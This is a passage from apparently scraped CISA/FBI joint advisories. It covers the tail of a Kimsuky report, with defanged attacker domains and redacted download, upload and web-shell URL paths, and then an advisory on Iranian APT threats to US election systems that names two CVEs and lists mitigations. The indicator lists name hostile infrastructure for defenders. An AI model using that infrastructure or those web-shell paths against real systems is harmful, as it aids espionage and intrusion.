solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>com-vps[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>com-ssl[.]work</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>desk-top[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>intemet[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>jp-ssl[.]work</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>org-vip[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>sslport[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>sslserver[.]work</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>ssltop[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>taplist[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>vpstop[.]work</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>webmain[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>preview.manage.org-view[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>intranet.ohchr.account-protect[.]work</code></p> </td> </tr> </tbody> </table> <p style="margin-bottom: 8px;"><font color="#000000"><font size="3">&nbsp;</font></font></p> <p class="text-align-center" style="margin-top: 8px; margin-bottom: 13px;"><em>Table 2: Redacted domains used by Kimsuky</em></p> <table style="border: medium none; width: 737px; border-collapse: collapse; margin-left: auto; margin-right: auto;"> <tbody> <tr> <td style="padding: 0in 7px; border: 1px solid black; border-image: none; width: 200px;" valign="top"> <p style="margin-top: 8px;"><code>[REDACTED]/home/dwn[.]php?van=101</code></p> </td> <td style="border-width: 1px 1px 1px medium; border-style: solid solid solid none; border-color: black black black currentColor; padding: 0in 7px; width: 230px;" valign="top"> <p style="margin-top: 8px;"><code>[REDACTED]/home/dwn[.]php?v%20an=101</code></p> </td> <td style="border-width: 1px 1px 1px medium; border-style: solid solid solid none; border-color: black black black currentcolor; padding: 0in 7px; width: 261px;" valign="top"> <p style="margin-top: 8px;"><code>[REDACTED]/home/dwn[.]php?van=102</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 200px;" valign="top"> <p style="margin-top: 8px;"><code>[REDACTED]/home/up[.]php?id=NQDPDE</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 230px;" valign="top"> <p style="margin-top: 8px;"><code>[REDACTED]/test/Update[.]php?wShell=201</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 261px;" valign="top"> <p style="margin-bottom: 8px;"><code><font color="#000000"><font size="3">&nbsp;</font></font></code></p> </td> </tr> </tbody> </table> <h3>Contact Information</h3><p style="margin-top: 8px; margin-bottom: 8px;">To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href="https://www.fbi.gov/contact-us/field-offices">www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at <a href="https://us-cert.cisa.gov mailto:CyWatch@fbi.gov">CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href="https://us-cert.cisa.govmailto:Central@cisa.dhs.gov">Central@cisa.dhs.gov</a>.</p> <div class="special_container text-align-center">&nbsp;</div> <div class="special_container text-align-center"><strong><em>DISCLAIMER</em></strong></div> <div class="special_container">&nbsp;</div> <div class="special_container"> <p><em>This information is provided "as is" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.</em></p> <p><em>The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.</em></p> </div> <p><o:p></o:p></p> <h3>References</h3> <ul> <li><a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">[1] Netscout: Stolen Pencil Campaign Targets Academia </a></li> <li><a href="https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829">[2] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries</a></li> <li><a href="https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829">[3] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries</a></li> <li><a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">[4] Netscout: Stolen Pencil Campaign Targets Academia </a></li> <li><a href="https://attack.mitre.org/groups/G0094/">[5] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href="https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities">[6] Securityweek.com: North Korean Suspected Cyber-espionage Attacks Against South Korea Entities</a></li> <li><a href="https://attack.mitre.org/groups/G0094/">[7] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf">[8] CrowdStrike: 2020 Global Threat Report</a></li> <li><a href="https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/">[9] Malwarebytes: APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure</a></li> <li><a href="https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html">[10] PwC: Tracking ‘Kimsuky’, the North Korea-based cyber espionage group: Part 2</a></li> <li><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf">[11] CrowdStrike: 2020 Global Threat Report</a></li> <li><a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">[12] Netscout: Stolen Pencil Campaign Targets Academia </a></li> <li><a href="https://attack.mitre.org/groups/G0094/">[13] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href="route:<nolink>">[14] Private Sector Partner</a></li> <li><a href="https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829">[15] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries</a></li> <li><a href="https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/">[16] Malwarebytes: APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure</a></li> <li><a href="https://www.cyberscoop.com/north-korea-accelerate-commercial-espionage-meet-kims-economic-deadline/">[17] cyberscoop: North Korea could accelerate commercial espionage to meet Kim’s economic deadline </a></li> <li><a href="https://attack.mitre.org/groups/G0094/">[18] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href="https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829">[19] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries</a></li> <li><a href="https://attack.mitre.org/groups/G0094/">[20] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href="https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/">[21] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks</a></li> <li><a href="https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/">[22] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks</a></li> <li><a href="https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829">[23] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries</a></li> <li><a href="https://attack.mitre.org/groups/G0094/">[24] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href="https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/">[25] Palo Alto Networks Unit 42: BabyShark Malware Part Two – Attacks Continue Using KimJongRAT and PCRat </a></li> <li><a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/">[26] McAfee: What is mshta, how can it be used and how to protect against it</a></li> <li><a href="https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/">[27] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks</a></li> <li><a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">[28] Netscout: Stolen Pencil Campaign Targets Academia</a></li> <li><a href="https://attack.mitre.org/groups/G0094/">[29] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href="https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/">[30] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks</a></li> <li><a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">[31] Netscout: Stolen Pencil Campaign Targets Academia </a></li> <li><a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">[32] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href="route:<nolink>">[33] Private Sector Partner</a></li> <li><a href="route:<nolink>">[34] Private Sector Partner</a></li> <li><a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">[35] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href="https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/">[36] Yoroi: The North Korean Kimsuky APT Keeps Threatening South Korea Evolving its TTPs</a></li> <li><a href="https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/">[37] Yoroi: The North Korean Kimsuky APT Keeps Threatening South Korea Evolving its TTPs</a></li> <li><a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">[38] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href="https://attack.mitre.org/groups/G0094/">[39] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">[40] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">[41] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">[42] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href="https://attack.mitre.org/groups/G0094/">[43] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/">[44] McAfee: What is mshta, how can it be used and how to protect against it</a></li> <li><a href="https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities">[45] Securityweek.com: North Korean Suspected Cyber-espionage Attacks Against South Korea Entities</a></li> <li><a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">[46] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href="https://attack.mitre.org/groups/G0094/">[47] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href="https://www.microsoft.com/security/blog/2019/05/09/detecting-credential-theft-through-memory-access-modelling-with-microsoft-defender-atp/">[48] Detecting credential theft through memory access modelling with Microsoft Defender ATP</a></li> <li><a href="https://attack.mitre.org/groups/G0094/">[49] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href="https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/">[50] ZDNet: Cyber-espionage-group-uses-chrome-extension-to-infect-victims</a></li> <li><a href="https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/">[51] ZDNet: Cyber-espionage-group-uses-chrome-extension-to-infect-victims</a></li> <li><a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">[52] Netscout: Stolen Pencil Campaign Targets Academia </a></li> <li><a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">[53] Netscout: Stolen Pencil Campaign Targets Academia </a></li> <li><a href="route:<nolink>">[54] Private Sector Partner</a></li> <li><a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">[55] Securelist: The “Kimsuky” Operation: A North Korean APT? </a></li> <li><a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">[56] Securelist: The “Kimsuky” Operation: A North Korean APT? </a></li> <li><a href="route:<nolink>">[57] Private Sector Partner</a></li> <li><a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">[58] Securelist: The “Kimsuky” Operation: A North Korean APT? </a></li> <li><a href="route:<nolink>">[59] Private Sector Partner</a></li> <li><a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">[60] Securelist: The “Kimsuky” Operation: A North Korean APT? </a></li> </ul> <h3>Revisions</h3> <ul> <li>October 27, 2020: Initial Version</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>

AA20-296B: Iranian Advanced Persistent Threat Actors Threaten Election-Related Systems
Original release date: October 22, 2020<br/><h3>Summary</h3><p>The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are warning that Iranian advanced persistent threat (APT) actors are likely intent on influencing and interfering with the U.S. elections to sow discord among voters and undermine public confidence in the U.S. electoral process.</p> <p>The APT actors are creating fictitious media sites and spoofing legitimate media sites to spread obtained U.S. voter-registration data, anti-American propaganda, and misinformation about voter suppression, voter fraud, and ballot fraud.</p> <p>The APT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, structured query language (SQL) injections attacks, spear-phishing campaigns, website defacements, and disinformation campaigns.&nbsp;</p> <p>Click here for a <a href="https://us-cert.cisa.gov/sites/default/files/Joint_CISA_FBI_CSA-AA20-296B_Iranian_APT_Actors_Threaten_Election-Related_Systems.pdf">PDF</a> version of this report.</p> <h3>Technical Details</h3><p class="MsoNormal">These actors have conducted a significant number of intrusions against U.S.-based networks since August 2019. The actors leveraged several Common Vulnerabilities and Exposures (CVEs)—notably <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-5902">CVE-2020-5902</a> and <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9248">CVE-2017-9248</a>—pertaining to virtual private networks (VPNs) and content management systems (CMSs).&nbsp; <o:p></o:p></p> <p class="MsoNormal"><o:p></o:p></p> <ul> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-5902">CVE-2020-5902</a> affects F5 VPNs. Remote attackers could exploit this vulnerability to execute arbitrary code. [<a href="https://support.f5.com/csp/article/K52145254">1</a>].</li> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9248">CVE-2017-9248</a> affects Telerik UI. Attackers could exploit this vulnerability in web applications using Telerik UI for ASP.NET AJAX to conduct cross-site scripting (XSS) attacks.[<a href="https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness">2</a>]</li> </ul> <p>Historically, these actors have conducted DDoS attacks, SQL injections attacks, spear-phishing campaigns, website defacements, and disinformation campaigns. These activities could render these systems temporarily inaccessible to the public or election officials, which could slow, but would not prevent, voting or the reporting of results.</p> <ul> <li><strong>A DDoS attack </strong>could slow or render election-related public-facing websites inaccessible by flooding the internet-accessible server with requests; this would prevent users from accessing online resources, such as voting information or non-official voting results. In the past, cyber actors have falsely claimed DDoS attacks have compromised the integrity of voting systems in an effort to mislead the public that their attack would prevent a voter from casting a ballot or change votes already cast.</li> <li><strong>A SQL injection</strong> involves a threat actor inserting malicious code into the entry field of an application, causing that code to execute if entries have not been sanitized. SQL injections are among the most dangerous and common exploits affecting websites. A SQL injection into a media company’s CMS could enable a cyber actor access to network systems to manipulate content or falsify news reports prior to publication.</li> <li><strong>Spear-phishing messages</strong> may not be easily detectible. These emails often ask victims to fill out forms or verify information through links embedded in the email. APT actors use spear phishing to gain access to information—often credentials, such as passwords—and to identify follow-on victims. A malicious cyber actor could use compromised email access to spread disinformation to the victims’ contacts or collect information sent to or from the compromised account.</li> <li><strong>Public-facing website defacements</strong> typically involve a cyber threat actor compromising the website or its associated CMS, allowing the actor to upload images to the site’s landing page. In situations where such public-facing websites relate to elections (e.g., the website of a county board of elections), defacements could cast doubt on the security and legitimacy of the websites’ information. If cyber actors were able to successfully change an election-related website, the underlying data and internal systems would remain uncompromised..</li> <li><strong>Disinformation campaigns </strong>involve malign actions taken by foreign governments or actors designed to sow discord, manipulate public discourse, or discredit the electoral system. Malicious actors often use social media as well as fictitious and spoofed media sites for these campaigns. Based on their corporate policies, social media companies have worked to counter these actors’ use of their platforms to promote fictitious news stories by removing the news stories, and in many instances, closing the accounts related to the malicious activity. However, these adversaries will continue their attempts to create fictitious accounts that promote divisive storylines to sow discord, even after the election.</li> </ul> <h3>Mitigations</h3><p>The following recommended mitigations list includes self-protection strategies against the cyber techniques used by the APT actors:</p> <ul> <li>Validate input—input validation is a method of sanitizing untrusted input provided by web application users. Implementing input validation can protect against security flaws of web applications by significantly reducing the probability of successful exploitation. Types of attacks possibly prevented include SQL injection, XSS, and command injection.</li> <li>Audit your network for systems using Remote Desktop Protocol (RDP) and other internet-facing services. Disable the service if unneeded or install available patches. Users may need to work with their technology vendors to confirm that patches will not affect system processes.</li> <li>Verify all cloud-based virtual machine instances with a public IP; do not have open RDP ports, unless there is a valid business reason to do so. Place any system with an open RDP port behind a firewall, and require users to use a VPN to access it through the firewall.</li> <li>Enable strong password requirements and account lockout policies to defend against brute-force attacks.</li> <li>Apply multi-factor authentication, when possible.</li> <li>Apply system and software updates regularly, particularly if you are deploying products affected by CVE-2020-5902 and CVE-2017-9248. <ul> <li>For patch information on CVE-2020-5902, refer to F5 Security Advisory <a href="https://support.f5.com/csp/article/K52145254">K52145254</a>.</li> <li>For patch information on CVE-2017-9248, refer to <a href="https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness">Progress Telerik details for CVE-2017-9248</a>.</li> </ul> </li> <li>Maintain a good information back-up strategy that involves routinely backing up all critical data and system configuration information on a separate device. Store the backups offline; verify their integrity and restoration process.</li> <li>Enable logging and ensure logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days, and review them regularly to detect intrusion attempts.</li> <li>When creating cloud-based virtual machines, adhere to the cloud provider's best practices for remote access.</li> <li>Ensure third parties that require RDP access are required to follow internal policies on remote access.</li> <li>Minimize network exposure for all control system devices. Where possible, critical devices should not have RDP enabled.</li> <li>Regulate and limit external to internal RDP connections. When external access to internal resources is required, use secure methods, such as VPNs, recognizing VPNs are only as secure as the connected devices.</li> <li>Be aware of unsolicited contact on social media from any individual you do not know.</li> <li>Be aware of attempts to pass links or files via social media from anyone you do not know.</li> <li>Be aware of unsolicited requests to share a file via online services.</li> <li>Be aware of email messages conveying suspicious alerts or other online accounts, including login notifications from foreign countries or other alerts indicating attempted unauthorized access to your accounts.</li> <li>Be suspicious of emails purporting to be from legitimate online services (e.g., the images in the email appear to be slightly pixelated and/or grainy, language in the email seems off, the email originates from an IP address not attributable to the provider/company).</li> <li>Be suspicious of unsolicited email messages that contain shortened links (e.g., via <code>tinyurl</code>, <code>bit.ly</code>).</li> <li>Use security features provided by social media platforms, use <a href="https://us-cert.cisa.gov/ncas/current-activity/2018/03/27/Creating-and-Managing-Strong-Passwords">strong passwords</a>, change passwords frequently, and use a different password for each social media account.</li> <li>See CISA’s <a href="https://us-cert.cisa.gov/ncas/tips/ST19-002">Tip on Best Practices for Securing Election Systems</a> for more information.</li> </ul> <h4>General Mitigations</h4> <h5>Keep applications and systems updated and patched</h5> <p>Apply all available software updates and patches; automate this process to the greatest extent possible (e.g., by using an update service provided directly from the vendor). Automating updates and patches is critical because of the speed at which threat actors create exploits after a patch is released. These “N-day” exploits can be as damaging as a zero-day exploits. Vendor updates must also be authentic; updates are typically signed and delivered over protected links to ensure the integrity of the content. Without rapid and thorough patch application, threat actors can operate inside a defender’s patch cycle.[<a href="https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf?v=1">3</a>] In addition to updating the application, use tools (e.g., the OWASP Dependency-Check Project tool[<a href="https://owasp.org/www-project-dependency-check/">4</a>]) to identify publicly known vulnerabilities in third-party libraries that the application depends on.</p> <h5>Scan web applications for SQL injection and other common web vulnerabilities</h5> <p>Implement a plan to scan public-facing web servers for common web vulnerabilities (SQL injection, cross-site scripting, etc.); use a commercial web application vulnerability scanner in combination with a source code scanner.[<a href="https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm">5</a>] As vulnerabilities are found, they should be fixed or patched. This is especially crucial for networks that host older web applications; as sites get older, more vulnerabilities are discovered and exposed.</p> <h5>Deploy a web application firewall&nbsp;</h5> <p>Deploy a web application firewall (WAF) to help prevent invalid input attacks and other attacks destined for the web application. WAFs are intrusion/detection/prevention devices that inspect each web request made to and from the web application to determine if the request is malicious. Some WAFs install on the host system and others are dedicated devices that sit in front of the web application. WAFs also weaken the effectiveness of automated web vulnerability scanning tools.</p> <h5>Deploy techniques to protect against web shells</h5> <p>Patch web application vulnerabilities or fix configuration weaknesses that allow web shell attacks, and follow guidance on detecting and preventing web shell malware.[<a href="https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF">6</a>] Malicious cyber actors often deploy web shells—software that can enable remote administration—on a victim’s web server. Malicious cyber actors can use web shells to execute arbitrary system commands, which are commonly sent over HTTP or HTTPS. Attackers often create web shells by adding or modifying a file in an existing web application. Web shells provide attackers with persistent access to a compromised network using communications channels disguised to blend in with legitimate traffic. Web shell malware is a long-standing, pervasive threat that continues to evade many security tools.</p> <h5>Use multi-factor authentication for administrator accounts</h5> <p>Prioritize protection for accounts with elevated privileges, with remote access, and/or used on high value assets.[<a href="https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs">7</a>] Use physical token-based authentication systems to supplement knowledge-based factors such as passwords and personal identification numbers (PINs).[<a href="https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf">8</a>] Organizations should migrate away from single-factor authentication, such as password-based systems, which are subject to poor user choices and more susceptible to credential theft, forgery, and password reuse across multiple systems.</p> <h5>Remediate critical web application security risks</h5> <p>First, identify and remedite critical web application security risks first; then, move on to other less critical vulnerabilities. Follow available guidance on securing web applications.[<a href="https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm">9</a>],[<a href="https://owasp.org/www-project-top-ten/">10</a>],[<a href="https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html">11</a>]</p> <h5>How do I respond to unauthorized access to election-related systems?</h5> <h6>Implement your security incident response and business continuity plan</h6> <p>It may take time for your organization’s IT professionals to isolate and remove threats to your systems and restore normal operations. In the meantime, take steps to maintain your organization’s essential functions according to your business continuity plan. Organizations should maintain and regularly test backup plans, disaster recovery plans, and business continuity procedures.</p> <h6>Contact CISA or law enforcement immediately</h6> <p>To report an intrusion and to request incident response resources or technical assistance, contact CISA (<a href="https://us-cert.cisa.govmailto:Central@cisa.dhs.gov">Central@cisa.dhs.gov</a> or 888-282-0870) or the Federal Bureau of Investigation (FBI) through a local field office or the FBI’s Cyber Division (<a href="https://us-cert.cisa.govmailto:CyWatch@ic.fbi.gov">CyWatch@ic.fbi.gov</a> or 855-292-3937).</p> <h3>Resources</h3> <ul> <li><a href="https://us-cert.cisa.gov/ncas/tips/ST19-002">CISA Tip:&nbsp;Best Practices for Securing Election Systems</a></li> <li><a href="https://us-cert.cisa.gov/ncas/tips/ST16-001">CISA Tip:&nbsp;Securing Voter Registration Data</a></li> <li><a href="https://us-cert.cisa.gov/ncas/tips/ST18-006">CISA Tip:&nbsp;Website Security</a></li> <li><a href="https://us-cert.cisa.gov/ncas/tips/ST04-014">CISA Tip:&nbsp;Avoiding Social Engineering and Phishing Attacks</a></li> <li><a href="https://us-cert.cisa.gov/ncas/tips/ST18-001">CISA Tip:&nbsp;Securing Network Infrastructure Devices</a></li> <li><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">CISA Activity Alert:&nbsp;Technical Approaches to Uncovering and Remediating Malicious Activity</a></li> <li><a href="https://www.cisa.gov/sites/default/files/publications/CISA_Insights_Actions_to_Counter_Email-Based_Attacks_on_Election-Related_S508C.pdf ">CISA Insights: Actions to Counter Email-Based Attacks On Election-related Entities</a></li> <li>FBI and CISA Public Service Announcement (PSA): <a href="https://ic3.gov/Media/Y2020/PSA201002">Spoofed Internet Domains and Email Accounts Pose Cyber and Disinformation Risks to Voters</a></li> <li>FBI and CISA PSA: <a href="https://www.ic3.gov/Media/Y2020/PSA201001">Foreign Actors Likely to Use Online Journals to Spread Disinformation Regarding 2020 Elections</a></li> <li>FBI and CISA PSA: <a href="https://www.ic3.gov/Media/Y2020/PSA200930">Distributed Denial of Service Attacks Could Hinder Access to Voting Information, Would Not Prevent Voting</a></li> <li>FBI and CISA PSA: <a href="https://www.ic3.gov/Media/Y2020/PSA200928">False Claims of Hacked Voter Information Likely Intended to Cast Doubt on Legitimacy of U.S. Elections</a></li> <li>FBI and CISA PSA: <a href="https://ic3.gov/Media/Y2020/PSA200924">Cyber Threats to Voting Processes Could Slow But Not Prevent Voting</a></li> <li>FBI and CISA PSA: <a href="https://ic3.gov/Media/Y2020/PSA200922">Foreign Actors and Cybercriminals Likely to Spread Disinformation Regarding 2020 Election Results</a><br /> &nbsp;</li> </ul> <h3>Contact Information</h3><p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href="http://www.fbi.gov/contact-us/field">www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at <a href="https://us-cert.cisa.govmailto:CyWatch@fbi.gov">CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href="https://us-cert.cisa.govmailto:Central@cisa.dhs.gov">Central@cisa.dhs.gov</a>.</p> <p><o:p></o:p></p> <h3>References</h3> <ul> <li><a href="https://support.f5.com/csp/article/K52145254">[1] F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902</a></li> <li><a href="https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness">[2] Progress Telerik details for CVE-2017-9248</a></li> <li><a href="https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf">[3] NSA "NSA'S Top Ten Cybersecurity Mitigation Strategies</a></li> <li><a href="https://owasp.org/www-project-dependency-check/">[4] OWASP Dependency-Check</a></li> <li><a href="https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm">[5] NSA "Defending Against the Exploitation of SQL Vulnerabilities to Compromise a Network" </a></li> <li><a 